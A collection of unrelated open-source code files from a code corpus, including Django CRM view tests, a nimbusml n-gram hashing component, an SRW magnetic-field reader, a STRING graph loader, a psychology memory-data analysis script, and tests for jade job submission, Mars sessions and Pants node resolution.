response = self.user_auth.get(
reverse(
'client_profile',
kwargs={'pk': CrmPagesTests.new_client.pk})
)
request_object = response.context['user']
self.assertEqual(
request_object.first_name, CrmPagesTests.new_client.first_name
)
self.assertEqual(
request_object.last_name, CrmPagesTests.new_client.last_name
)
self.assertEqual(request_object.email, CrmPagesTests.new_client.email)
self.assertEqual(request_object.phone, CrmPagesTests.new_client.phone)
def test_delete_client_profile(self):
self.user_auth.post(
reverse(
'client_profile_delete',
kwargs={'pk': CrmPagesTests.new_client.pk}))
response = self.user_auth.get(
reverse(
'client_profile',
kwargs={'pk': CrmPagesTests.new_client.pk})
)
self.assertEqual(response.status_code, HTTPStatus.NOT_FOUND)
self.assertFalse(
ClientProfile.objects.filter(
id=CrmPagesTests.new_client.id).exists()
)
|
the-stack_106_19048
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------------------------
# - Generated by tools/entrypoint_compiler.py: do not edit by hand
"""
NgramHash
"""
__all__ = ["NgramHash"]
import numbers
from .....utils.entrypoints import Component
from .....utils.utils import trace, try_set
class NgramHash(Component):
"""
Extracts NGrams from text and converts them to vector using hashing
trick.
.. remarks::
The ``NGramFeaturizer`` transform produces a bag of counts of
sequences of consecutive words, called n-grams, from a given corpus
of text.
There are two ways it can do this:
* build a dictionary of n-grams and use the id in the dictionary as
the index in the bag;
* hash each n-gram and use the hash value as the index in the bag.
        This class provides the text extractor that implements the second. In
:py:class:`NGramFeaturizer
<nimbusml.feature_extraction.text.NGramFeaturizer>`,
users should specify which text extractor to use as the argument.
The purpose of hashing is to convert variable-length text documents
into equal-length numeric feature vectors, to support
dimensionality reduction and to make the lookup of feature weights
faster.
The n-grams are represented as count vectors, with vector slots
corresponding to their hashes. Embedding ngrams in
a vector space allows their contents to be compared in an efficient
manner.
The slot values in the vector can be weighted by the following
factors:
* *term frequency* - The number of occurrences of the slot in the
text
* *inverse document frequency* - A ratio (the logarithm of
inverse relative slot frequency) that measures the information a
slot
provides by determining how common or rare it is across the entire
text.
* *term frequency-inverse document frequency* - the product
term frequency and the inverse document frequency.
:param number_of_bits: Number of bits to hash into. Must be between 1 and
30, inclusive.
:param ngram_length: Ngram length.
:param skip_length: Maximum number of tokens to skip when constructing an
n-gram.
:param all_lengths: Whether to include all n-gram lengths up to ngramLength
or only ngramLength.
:param seed: Hashing seed.
:param ordered: Whether the position of each source column should be
included in the hash (when there are multiple source columns).
:param maximum_number_of_inverts: Limit the number of keys used to generate
the slot name to this many. 0 means no invert hashing, -1 means no
limit.
:param params: Additional arguments sent to compute engine.
.. seealso::
:py:class:`NGramFeaturizer
<nimbusml.feature_extraction.text.NGramFeaturizer>`,
:py:class:`Ngram <nimbusml.feature_extraction.text.extractor.Ngram>`
.. index:: transform, featurizer, text
Example:
.. literalinclude:: /../nimbusml/examples/NGramFeaturizer3.py
:language: python
"""
@trace
def __init__(
self,
number_of_bits=16,
ngram_length=1,
skip_length=0,
all_lengths=True,
seed=314489979,
ordered=True,
maximum_number_of_inverts=0,
**params):
self.number_of_bits = number_of_bits
self.ngram_length = ngram_length
self.skip_length = skip_length
self.all_lengths = all_lengths
self.seed = seed
self.ordered = ordered
self.maximum_number_of_inverts = maximum_number_of_inverts
self.kind = 'NgramExtractor'
self.name = 'NGramHash'
self.settings = {}
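        # Each argument below is validated with try_set and stored in self.settings under
        # the key name expected by the NGramHash entrypoint (e.g. 'NumberOfBits').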
if number_of_bits is not None:
self.settings['NumberOfBits'] = try_set(
obj=number_of_bits,
none_acceptable=True,
is_of_type=numbers.Real)
if ngram_length is not None:
self.settings['NgramLength'] = try_set(
obj=ngram_length,
none_acceptable=True,
is_of_type=numbers.Real)
if skip_length is not None:
self.settings['SkipLength'] = try_set(
obj=skip_length,
none_acceptable=True,
is_of_type=numbers.Real)
if all_lengths is not None:
self.settings['AllLengths'] = try_set(
obj=all_lengths, none_acceptable=True, is_of_type=bool)
if seed is not None:
self.settings['Seed'] = try_set(
obj=seed,
none_acceptable=True,
is_of_type=numbers.Real)
if ordered is not None:
self.settings['Ordered'] = try_set(
obj=ordered, none_acceptable=True, is_of_type=bool)
if maximum_number_of_inverts is not None:
self.settings['MaximumNumberOfInverts'] = try_set(
obj=maximum_number_of_inverts,
none_acceptable=True,
is_of_type=numbers.Real)
super(
NgramHash,
self).__init__(
name=self.name,
settings=self.settings,
kind=self.kind)
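# Usage sketch (an assumption based on the docstring above; the import path and the
# word_feature_extractor parameter name are illustrative, not verified against nimbusml):
#
#     from nimbusml.feature_extraction.text import NGramFeaturizer
#     from nimbusml.feature_extraction.text.extractor import NgramHash
#     featurizer = NGramFeaturizer(word_feature_extractor=NgramHash(number_of_bits=16,
#                                                                   ngram_length=2))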
|
the-stack_106_19053
|
from oasys_srw.srwlib import SRWLMagFldC, SRWLMagFld3D, array
from syned.storage_ring.magnetic_structure import MagneticStructure
from wofrysrw.storage_ring.srw_magnetic_structure import SRWMagneticStructure
# from original SRW Example 01, by Oleg Chubar (BNL)
def AuxReadInMagFld3D(filePath, sCom):
f = open(filePath, 'r')
f.readline() # 1st line: just pass
xStart = float(f.readline().split(sCom, 2)[1]) # 2nd line: initial X position [m]; it will not actually be used
xStep = float(f.readline().split(sCom, 2)[1]) # 3rd line: step vs X [m]
xNp = int(f.readline().split(sCom, 2)[1]) # 4th line: number of points vs X
yStart = float(f.readline().split(sCom, 2)[1]) # 5th line: initial Y position [m]; it will not actually be used
yStep = float(f.readline().split(sCom, 2)[1]) # 6th line: step vs Y [m]
yNp = int(f.readline().split(sCom, 2)[1]) # 7th line: number of points vs Y
zStart = float(f.readline().split(sCom, 2)[1]) # 8th line: initial Z position [m]; it will not actually be used
zStep = float(f.readline().split(sCom, 2)[1]) # 9th line: step vs Z [m]
zNp = int(f.readline().split(sCom, 2)[1]) # 10th line: number of points vs Z
totNp = xNp * yNp * zNp
locArBx = array('d', [0] * totNp)
locArBy = array('d', [0] * totNp)
locArBz = array('d', [0] * totNp)
for i in range(totNp):
curLineParts = f.readline().split('\t')
if len(curLineParts) == 3:
locArBx[i] = float(curLineParts[0].strip())
locArBy[i] = float(curLineParts[1].strip())
locArBz[i] = float(curLineParts[2].strip())
f.close()
xRange = xStep
if xNp > 1: xRange = (xNp - 1) * xStep
yRange = yStep
if yNp > 1: yRange = (yNp - 1) * yStep
zRange = zStep
if zNp > 1: zRange = (zNp - 1) * zStep
return SRWLMagFld3D(locArBx, locArBy, locArBz, xNp, yNp, zNp, xRange, yRange, zRange, 1)
class SRW3DMagneticStructure(MagneticStructure, SRWMagneticStructure):
def __init__(self,
file_name="",
comment_character="#",
interpolation_method=1):
MagneticStructure.__init__(self)
self.file_name = file_name
self.comment_character = comment_character
self.interpolation_method=interpolation_method
def get_SRWMagneticStructure(self):
return AuxReadInMagFld3D(self.file_name, self.comment_character)
def get_SRWLMagFldC(self):
magnetic_field_container = SRWLMagFldC() # Container
magnetic_field_container.allocate(1) # Magnetic Field consists of 1 part
magnetic_field_container.arMagFld[0] = self.get_SRWMagneticStructure()
magnetic_field_container.arMagFld[0].interp = self.interpolation_method
magnetic_field_container.arXc[0] = self.horizontal_central_position
magnetic_field_container.arYc[0] = self.vertical_central_position
magnetic_field_container.arZc[0] = self.longitudinal_central_position
magnetic_field_container.arMagFld[0].nRep = 1
return magnetic_field_container
@classmethod
def get_default_initial_z(cls, file_name, comment_character="#", longitudinal_central_position=0):
return longitudinal_central_position - 0.5*AuxReadInMagFld3D(file_name, comment_character).rz
@classmethod
def get_source_length(cls, file_name, comment_character="#"):
return AuxReadInMagFld3D(file_name, comment_character).rz
def to_python_code(self, data=None):
text_code = self.to_python_code_aux()
text_code += "magnetic_field_container = SRWLMagFldC()" + "\n"
text_code += "magnetic_field_container.allocate(1)" + "\n"
text_code += "magnetic_field_container.arMagFld[0] = magnetic_structure" + "\n"
text_code += "magnetic_field_container.arMagFld[0].interp = " + str(self.interpolation_method) + "\n"
text_code += "magnetic_field_container.arXc[0] = " + str(self.horizontal_central_position) + "\n"
text_code += "magnetic_field_container.arYc[0] = " + str(self.vertical_central_position) + "\n"
text_code += "magnetic_field_container.arZc[0] = " + str(self.longitudinal_central_position) + "\n"
return text_code
def to_python_code_aux(self):
text_code = "def AuxReadInMagFld3D(filePath, sCom):" + "\n" + \
" f = open(filePath, 'r')" + "\n" + \
" f.readline() # 1st line: just pass" + "\n\n" + \
" xStart = float(f.readline().split(sCom, 2)[1]) # 2nd line: initial X position [m]; it will not actually be used" + "\n" + \
" xStep = float(f.readline().split(sCom, 2)[1]) # 3rd line: step vs X [m]" + "\n" + \
" xNp = int(f.readline().split(sCom, 2)[1]) # 4th line: number of points vs X" + "\n" + \
" yStart = float(f.readline().split(sCom, 2)[1]) # 5th line: initial Y position [m]; it will not actually be used" + "\n" + \
" yStep = float(f.readline().split(sCom, 2)[1]) # 6th line: step vs Y [m]" + "\n" + \
" yNp = int(f.readline().split(sCom, 2)[1]) # 7th line: number of points vs Y" + "\n" + \
" zStart = float(f.readline().split(sCom, 2)[1]) # 8th line: initial Z position [m]; it will not actually be used" + "\n" + \
" zStep = float(f.readline().split(sCom, 2)[1]) # 9th line: step vs Z [m]" + "\n" + \
" zNp = int(f.readline().split(sCom, 2)[1]) # 10th line: number of points vs Z" + "\n" + \
" totNp = xNp * yNp * zNp" + "\n" + \
" locArBx = array('d', [0] * totNp)" + "\n" + \
" locArBy = array('d', [0] * totNp)" + "\n" + \
" locArBz = array('d', [0] * totNp)" + "\n\n" + \
" for i in range(totNp):" + "\n" + \
" curLineParts = f.readline().split('\t')" + "\n" + \
" if len(curLineParts) == 3:" + "\n" + \
" locArBx[i] = float(curLineParts[0].strip())" + "\n" + \
" locArBy[i] = float(curLineParts[1].strip())" + "\n" + \
" locArBz[i] = float(curLineParts[2].strip())" + "\n" + \
" f.close()" + "\n" + \
" xRange = xStep" + "\n" + \
" if xNp > 1: xRange = (xNp - 1) * xStep" + "\n" + \
" yRange = yStep" + "\n" + \
" if yNp > 1: yRange = (yNp - 1) * yStep" + "\n" + \
" zRange = zStep" + "\n" + \
" if zNp > 1: zRange = (zNp - 1) * zStep" + "\n" + \
" return SRWLMagFld3D(locArBx, locArBy, locArBz, xNp, yNp, zNp, xRange, yRange, zRange, 1)\n\n"
text_code += "magnetic_structure = AuxReadInMagFld3D(\"" + str(self.file_name) + "\",\"" + str(self.comment_character) + "\")" + "\n"
return text_code
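# Usage sketch (file name is hypothetical): build the structure from a tab-separated 3D
# field map and obtain the SRW container used by downstream calculations.
#
#     structure = SRW3DMagneticStructure(file_name="field_map.dat", comment_character="#")
#     container = structure.get_SRWLMagFldC()  # SRWLMagFldC holding one SRWLMagFld3D element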
|
the-stack_106_19054
|
"""
This file offers the methods to automatically retrieve the graph Planctopirus hydrillae.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def PlanctopirusHydrillae(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Planctopirus hydrillae graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
        Whether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True,
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2,
        Whether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
    Instance of Planctopirus hydrillae graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="PlanctopirusHydrillae",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
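# Usage sketch (assumes the ensmallen backend is installed and the STRING files can be
# downloaded or are already cached):
#
#     graph = PlanctopirusHydrillae(directed=False, version="links.v11.5")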
|
the-stack_106_19057
|
import pandas as pd

from paper_graphics_style import p_convert
# NOTE: this script also assumes project-local helpers that are not imported here
# (onesample_bdm, all_sub_args, bids_meta, cons); they are expected to come from the
# project's shared analysis modules.
'''code for grabbing all the data necessary for the tables of memory data'''
ctx_rname = {'baseline':'pre-conditioning','acquisition':'fear conditioning','extinction':'post-conditioning','':''}
ctx_rname_short = {'baseline':'pre','acquisition':'cond.','extinction':'post'}
'''recognition memory'''
df = pd.read_csv('../cleaned_corrected_recognition.csv')
table = df.groupby(['condition','encode_phase'])['cr'].apply(onesample_bdm)[['avg','CI_l','CI_u']]
table['sem'] = df.groupby(['condition','encode_phase'])['cr'].sem()
table['95% CI'] = table[['CI_l','CI_u']].values.tolist()
table = table.reset_index().drop(columns=['level_2','CI_l','CI_u']
).rename(columns={'condition':'CS Type',
'encode_phase':'Temporal Context',
'avg':'Mean',
'sem':'Std. Error'})
table = table[['Temporal Context','CS Type','Mean','95% CI','Std. Error']]
#and false alarms
fadf = df[df.encode_phase=='baseline'].drop(columns='encode_phase')
fatable = fadf.groupby(['condition'])['fa'].apply(onesample_bdm)[['avg','CI_l','CI_u']]
fatable = fatable.reset_index().set_index('condition').drop(columns='level_1')
fatable['sem'] = fadf.groupby('condition')['fa'].sem()
fatable['95% CI'] = fatable[['CI_l','CI_u']].values.tolist()
fatable = fatable.reset_index().drop(columns=['CI_l','CI_u']
).rename(columns={'condition':'CS Type',
'encode_phase':'Temporal Context',
'avg':'Mean',
'sem':'Std. Error'})
fatable['Temporal Context'] = ''
fatable = fatable[['Temporal Context','CS Type','Mean','95% CI','Std. Error']]
table = pd.concat((table,fatable))
table['Temporal Context'] = table['Temporal Context'].apply(lambda x: ctx_rname[x])
table['Temporal Context'] = pd.Categorical(table['Temporal Context'],['pre-conditioning','fear conditioning','post-conditioning',''],ordered=True)
table.sort_values(by='Temporal Context').round(4).to_csv('../paper/corrected_recognition_table.csv',index=False)
'''Replicating Dunsmoor (2015) Nature - mean proportion of responses'''
dfs = {}
for sub in all_sub_args:
if sub in [18,20,120]:
pass
else:
subj = bids_meta(sub)
old = subj.mem_df[subj.mem_df.memory_condition == 'Old'].reset_index(drop=True)[['trial_type','encode_phase','response','stimulus']]
old.response[old.response.isna()] = 'DN'
old = old.groupby(['trial_type','encode_phase','response']).count() / 24
new = subj.mem_df[subj.mem_df.memory_condition == 'New'].reset_index(drop=True)[['trial_type','encode_phase','response','stimulus']]
new.response[new.response.isna()] = 'DN'
new = new.groupby(['trial_type','encode_phase','response']).count() / 48
sub_df = pd.concat((old,new))
for con in cons:
for phase in ['baseline','acquisition','extinction','foil']:
for resp in ['DN','DO','MN','MO']:
try:
sub_df.loc[(con,phase,resp)]
except:
sub_df.loc[(con,phase,resp),'stimulus'] = 0.0
sub_df['subject'] = sub
dfs[sub] = sub_df.sort_index()
table = pd.concat(dfs.values()
).rename(columns={'stimulus':'proportion'}
).drop(columns=['subject']
).reset_index(
).groupby(['trial_type','encode_phase','response']
).mean(
).unstack(-1)
table.columns = table.columns.droplevel()
table = table[['DO','MO','MN','DN']]
table = table.reset_index()
table.encode_phase = pd.Categorical(table.encode_phase,['baseline','acquisition','extinction','foil'],ordered=True)
table = table.set_index(['encode_phase','trial_type']).sort_index()
table.round(3).to_csv('../paper/tables/Dunsmoor_2015_rep_table.csv')
'''Source memory'''
df = pd.read_csv('../cleaned_avg_sm.csv')
df['encode_phase'] = df['encode_phase'].apply(lambda x: ctx_rname[x])
df['encode_phase'] = pd.Categorical(df['encode_phase'],['pre-conditioning','fear conditioning','post-conditioning'],ordered=True)
df['response_phase'] = df['response_phase'].apply(lambda x: ctx_rname_short[x])
df['response_phase'] = pd.Categorical(df['response_phase'],['pre','cond.','post'],ordered=True)
table = df.groupby(['encode_phase','condition','response_phase'])['prop'].apply(onesample_bdm,(1/3))[['avg','CI_l','CI_u','p','tail']]
table['95% CI'] = table[['CI_l','CI_u']].values.tolist()
table = table.droplevel(-1).drop(columns=['CI_l','CI_u','tail']
).reset_index().rename(columns={'avg':'Mean',
'sem':'Std. Error',
'p':'P',
'encode_phase':'Temporal Context',
'condition':'CS Type',
'response_phase':'Response'})
table = table[['Temporal Context','CS Type','Response','Mean','95% CI','P']]
table['_sig'] = table.P.apply(p_convert)
table.round(4).to_csv('../paper/source_memory_table.csv',index=False)
'''Source memory betas'''
df = pd.concat((pd.read_csv('../paper/acquisition_sm_betas.csv'),
pd.read_csv('../paper/baseline_sm_betas.csv'),
pd.read_csv('../paper/extinction_sm_betas.csv'))).reset_index(drop=True)
df = df[['encode_phase','condition','response_phase','beta','ci','p']]
df['encode_phase'] = df['encode_phase'].apply(lambda x: ctx_rname[x])
df['encode_phase'] = pd.Categorical(df['encode_phase'],['pre-conditioning','fear conditioning','post-conditioning'],ordered=True)
df['response_phase'] = df['response_phase'].apply(lambda x: ctx_rname_short[x])
df['response_phase'] = pd.Categorical(df['response_phase'],['pre','cond.','post'],ordered=True)
table = df.rename(columns={'encode_phase':'Temporal Context',
'condition':'CS Type',
'response_phase':'Response',
'beta':'Mean',
'ci':'95% CI',
'p':'P'})
table.P = table.P.apply(lambda x: 0.0001 if x == 0 else x)
table = table.sort_values(by=['Temporal Context','CS Type','Response'])
table['_sig'] = table.P.apply(p_convert)
table.round(4).to_csv('../paper/source_memory_betas_table.csv',index=False)
'''Typicality betas'''
df = pd.read_csv('../paper/tables/typicality_betas.csv')
df = df[['phase','condition','beta','ci','p']]
df['phase'] = df['phase'].apply(lambda x: ctx_rname[x])
df['phase'] = pd.Categorical(df['phase'],['pre-conditioning','fear conditioning','post-conditioning'],ordered=True)
table = df.rename(columns={'phase':'Temporal Context',
'condition':'CS Type',
'beta':'Mean',
'ci':'95% CI',
'p':'P'})
table = table.sort_values(by=['Temporal Context','CS Type'])
table['_sig'] = table.P.apply(p_convert)
table.round(4).to_csv('../paper/tables/typicality_table.csv',index=False)
'''table with hit rate split by source memory responses'''
df = pd.read_csv('../cleaned_full_sm.csv')
df['encode_phase'] = df['encode_phase'].apply(lambda x: ctx_rname[x])
df['encode_phase'] = pd.Categorical(df['encode_phase'],['pre-conditioning','fear conditioning','post-conditioning'],ordered=True)
df['source_memory'] = df['source_memory'].apply(lambda x: ctx_rname_short[x])
df['source_memory'] = pd.Categorical(df['source_memory'],['pre','cond.','post'],ordered=True)
df = df.groupby(['encode_phase','condition','source_memory','subject']).mean()
table = df.groupby(['encode_phase','condition','source_memory'])['hc_acc'].mean()
table = table.reset_index().set_index(['encode_phase','condition','source_memory'])
table['sem'] = df.groupby(['encode_phase','condition','source_memory'])['hc_acc'].sem()
table = table.reset_index().rename(columns={'hc_acc':'Mean',
'sem':'Std. Error',
'encode_phase':'Temporal Context',
'condition':'CS Type',
'source_memory':'Response'})
table.round(4).to_csv('../paper/tables/hit_rate_by_source_memory.csv',index=False)
|
the-stack_106_19058
|
"""Unit tests for submission groups"""
import copy
import os
import shutil
from pathlib import Path
import pytest
from jade.extensions.generic_command import GenericCommandInputs
from jade.extensions.generic_command import GenericCommandConfiguration
from jade.hpc.common import HpcType
from jade.jobs.job_configuration_factory import create_config_from_file
from jade.models import SubmissionGroup, SubmitterParams
from jade.test_common import FAKE_HPC_CONFIG
from jade.utils.run_command import check_run_command, run_command
from jade.utils.utils import load_data
TEST_FILENAME = "test-inputs.txt"
CONFIG_FILE = "test-config.json"
OUTPUT = "test-output"
SUBMIT_JOBS = "jade submit-jobs -R none"
WAIT = "jade wait"
@pytest.fixture
def cleanup():
yield
for path in (TEST_FILENAME, CONFIG_FILE, OUTPUT):
if os.path.isdir(path):
shutil.rmtree(path)
elif os.path.exists(path):
os.remove(path)
def test_submission_groups(cleanup):
config = create_config()
config.dump(CONFIG_FILE)
cmd = f"{SUBMIT_JOBS} {CONFIG_FILE} --output={OUTPUT} -h {FAKE_HPC_CONFIG} -p 0.1"
check_run_command(cmd)
output_path = Path(OUTPUT)
config_batch_files = list(output_path.glob("config_batch*.json"))
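# Expected batching: group1 holds jobs 1-3 with per_node_batch_size=3 (one batch);
# group2 holds jobs 4-5 with per_node_batch_size=1 (two batches) -> three batch files.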
assert len(config_batch_files) == 3
batch1 = load_data(output_path / "config_batch_1.json")
assert len(batch1["jobs"]) == 3
batch2 = load_data(output_path / "config_batch_2.json")
assert len(batch2["jobs"]) == 1
assert batch2["jobs"][0]["job_id"] == 4
batch3 = load_data(output_path / "config_batch_3.json")
assert len(batch3["jobs"]) == 1
assert batch3["jobs"][0]["job_id"] == 5
def test_submission_groups_duplicate_name(cleanup):
config = create_config()
config.submission_groups[0].name = config.submission_groups[1].name
config.dump(CONFIG_FILE)
cmd = f"{SUBMIT_JOBS} {CONFIG_FILE} --output={OUTPUT} -h {FAKE_HPC_CONFIG} --dry-run"
assert run_command(cmd) != 0
def test_submission_groups_mixed_hpc_types(cleanup):
config = create_config()
config.submission_groups[0].submitter_params.hpc_config.hpc_type = HpcType.SLURM
config.dump(CONFIG_FILE)
cmd = f"{SUBMIT_JOBS} {CONFIG_FILE} --output={OUTPUT} -h {FAKE_HPC_CONFIG} --dry-run"
assert run_command(cmd) != 0
def test_submission_groups_mixed_max_nodes(cleanup):
config = create_config()
config.submission_groups[0].submitter_params.max_nodes = 5
config.dump(CONFIG_FILE)
cmd = f"{SUBMIT_JOBS} {CONFIG_FILE} --output={OUTPUT} -h {FAKE_HPC_CONFIG} --dry-run"
assert run_command(cmd) != 0
def test_submission_groups_per_node_setup(cleanup):
config = create_config()
config.submission_groups[1].submitter_params.node_setup_script = "node.sh"
config.dump(CONFIG_FILE)
cmd = f"{SUBMIT_JOBS} {CONFIG_FILE} --output={OUTPUT} -h {FAKE_HPC_CONFIG} --dry-run"
check_run_command(cmd)
config = create_config_from_file(Path(OUTPUT) / "config_batch_2.json")
assert config.get_default_submission_group().submitter_params.node_setup_script == "node.sh"
def create_config():
num_commands = 5
commands = ['echo "hello world"'] * num_commands
with open(TEST_FILENAME, "w") as f_out:
for command in commands:
f_out.write(command + "\n")
inputs = GenericCommandInputs(TEST_FILENAME)
config = GenericCommandConfiguration(job_inputs=inputs)
jobs = list(inputs.iter_jobs())
for i, job_param in enumerate(jobs):
if i < 3:
job_param.submission_group = "group1"
else:
job_param.submission_group = "group2"
config.add_job(job_param)
hpc_config1 = load_data(FAKE_HPC_CONFIG)
hpc_config2 = copy.deepcopy(hpc_config1)
hpc_config1["hpc"]["walltime"] = "1:00:00"
hpc_config2["hpc"]["walltime"] = "5:00:00"
params1 = SubmitterParams(hpc_config=hpc_config1, per_node_batch_size=3)
params2 = SubmitterParams(hpc_config=hpc_config2, per_node_batch_size=1)
group1 = SubmissionGroup(name="group1", submitter_params=params1)
group2 = SubmissionGroup(name="group2", submitter_params=params2)
config.append_submission_group(group1)
config.append_submission_group(group2)
return config
|
the-stack_106_19059
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2018 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from mars.tensor.execution.core import Executor
from mars.tensor import ones
from mars.session import LocalSession, Session
class Test(unittest.TestCase):
def setUp(self):
self.executor = Executor('numpy')
local_session = LocalSession()
local_session._executor = self.executor
self.session = Session()
self.session._sess = local_session
def testDecref(self):
a = ones((10, 20), chunk_size=5)
b = a + 1
b.execute(session=self.session)
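# ones((10, 20), chunk_size=5) is split into a 2 x 4 grid of chunks, so executing
# `b` leaves 8 chunk results in the executor's cache.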
self.assertEqual(len(self.executor.chunk_result), 8)
del b
# decref called
self.assertEqual(len(self.executor.chunk_result), 0)
|
the-stack_106_19060
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import json
import os
from textwrap import dedent
from pants.build_graph.target import Target
from pants_test.tasks.task_test_base import TaskTestBase
from pants.contrib.node.subsystems.resolvers.node_preinstalled_module_resolver import \
NodePreinstalledModuleResolver
from pants.contrib.node.subsystems.resolvers.npm_resolver import NpmResolver
from pants.contrib.node.targets.node_module import NodeModule
from pants.contrib.node.targets.node_preinstalled_module import NodePreinstalledModule
from pants.contrib.node.targets.node_remote_module import NodeRemoteModule
from pants.contrib.node.tasks.node_paths import NodePaths
from pants.contrib.node.tasks.node_resolve import NodeResolve
class NodeResolveTest(TaskTestBase):
@classmethod
def task_type(cls):
return NodeResolve
def setUp(self):
super(NodeResolveTest, self).setUp()
NodeResolve.register_resolver_for_type(NodePreinstalledModule, NodePreinstalledModuleResolver)
NodeResolve.register_resolver_for_type(NodeModule, NpmResolver)
def tearDown(self):
super(NodeResolveTest, self).tearDown()
NodeResolve._clear_resolvers()
def test_register_resolver_for_type(self):
NodeResolve._clear_resolvers()
self.assertIsNone(NodeResolve._resolver_for_target(NodePreinstalledModule))
self.assertIsNone(NodeResolve._resolver_for_target(NodeModule))
node_preinstalled_module_target = self.make_target(
spec=':empty_fake_node_preinstalled_module_target',
target_type=NodePreinstalledModule)
NodeResolve.register_resolver_for_type(NodePreinstalledModule, NodePreinstalledModuleResolver)
self.assertEqual(NodePreinstalledModuleResolver,
NodeResolve._resolver_for_target(node_preinstalled_module_target))
node_module_target = self.make_target(spec=':empty_fake_node_module_target',
target_type=NodeModule)
NodeResolve.register_resolver_for_type(NodeModule, NpmResolver)
self.assertEqual(NpmResolver,
NodeResolve._resolver_for_target(node_module_target))
def test_product_types(self):
self.assertEqual([NodePaths], NodeResolve.product_types())
def test_noop(self):
task = self.create_task(self.context())
task.execute()
def test_noop_na(self):
target = self.make_target(spec=':not_a_node_target', target_type=Target)
task = self.create_task(self.context(target_roots=[target]))
task.execute()
def test_resolve_simple(self):
typ = self.make_target(spec='3rdparty/node:typ', target_type=NodeRemoteModule, version='0.6.3')
self.create_file('src/node/util/package.json', contents=dedent("""
{
"name": "util",
"version": "0.0.1"
}
"""))
self.create_file('src/node/util/util.js', contents=dedent("""
var typ = require('typ');
console.log("type of boolean is: " + typ.BOOLEAN);
"""))
target = self.make_target(spec='src/node/util',
target_type=NodeModule,
sources=['util.js', 'package.json'],
dependencies=[typ])
context = self.context(target_roots=[target])
task = self.create_task(context)
task.execute()
node_paths = context.products.get_data(NodePaths)
node_path = node_paths.node_path(target)
self.assertIsNotNone(node_path)
script_path = os.path.join(node_path, 'util.js')
out = task.node_distribution.node_command(args=[script_path]).check_output()
self.assertIn('type of boolean is: boolean', out)
def test_resolve_simple_graph(self):
typ1 = self.make_target(spec='3rdparty/node:typ1',
target_type=NodeRemoteModule,
package_name='typ',
version='0.6.x')
typ2 = self.make_target(spec='3rdparty/node:typ2',
target_type=NodeRemoteModule,
package_name='typ',
version='0.6.1')
self.create_file('src/node/util/package.json', contents=dedent("""
{
"name": "util",
"version": "0.0.1"
}
"""))
self.create_file('src/node/util/typ.js', contents=dedent("""
var typ = require('typ');
module.exports = {
BOOL: typ.BOOLEAN
};
"""))
util = self.make_target(spec='src/node/util',
target_type=NodeModule,
sources=['typ.js', 'package.json'],
dependencies=[typ1])
self.create_file('src/node/leaf/package.json', contents=dedent("""
{
"name": "leaf",
"version": "0.0.1"
}
"""))
self.create_file('src/node/leaf/leaf.js', contents=dedent("""
var typ = require('typ');
var util_typ = require('util/typ');
console.log("type of boolean is: " + typ.BOOLEAN);
console.log("type of bool is: " + util_typ.BOOL);
"""))
leaf = self.make_target(spec='src/node/leaf',
target_type=NodeModule,
sources=['leaf.js', 'package.json'],
dependencies=[util, typ2])
context = self.context(target_roots=[leaf])
task = self.create_task(context)
task.execute()
node_paths = context.products.get_data(NodePaths)
self.assertIsNotNone(node_paths.node_path(util))
node_path = node_paths.node_path(leaf)
self.assertIsNotNone(node_paths.node_path(leaf))
# Verify the 'typ' package is not duplicated under leaf. The target dependency tree is:
# leaf
# typ2 (0.6.1)
# util
# typ1 (0.6.x)
# If we install leaf normally, NPM will install the typ2 target (typ version 0.6.1) at the top
